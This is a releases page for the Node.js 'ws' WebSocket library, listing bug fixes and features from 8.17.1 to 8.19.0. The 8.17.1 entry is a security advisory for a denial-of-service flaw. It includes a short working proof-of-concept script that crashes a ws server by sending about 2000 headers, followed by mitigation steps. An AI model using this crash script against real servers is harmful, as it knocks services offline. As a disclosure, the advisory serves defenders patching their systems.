Releases · websockets/ws
8.19.0
8.18.3
Bug fixes
- Fixed a spec violation where the
Sec-WebSocket-Versionheader was not added
to the HTTP response if the client requested version was either invalid or
unacceptable (#2291).
8.18.2
Bug fixes
- Fixed an issue that, during message decompression when the maximum size was
exceeded, led to the emission of an inaccurate error and closure of the
connection with an improper close code (#2285).
8.18.1
8.18.0
Features
- Added support for
Blob(#2229).
8.17.1
Bug fixes
- Fixed a DoS vulnerability (#2231).
A request with a number of headers exceeding theserver.maxHeadersCount
threshold could be used to crash a ws server.
const http = require('http'); const WebSocket = require('ws'); const wss = new WebSocket.Server({ port: 0 }, function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: wss.address().port }); request.end(); });
The vulnerability was reported by Ryan LaPointe in #2230.
In vulnerable versions of ws, the issue can be mitigated in the following ways:
- Reduce the maximum allowed length of the request headers using the
--max-http-header-size=sizeand/or themaxHeaderSizeoptions so
that no more headers than theserver.maxHeadersCountlimit can be sent. - Set
server.maxHeadersCountto0so that no limit is applied.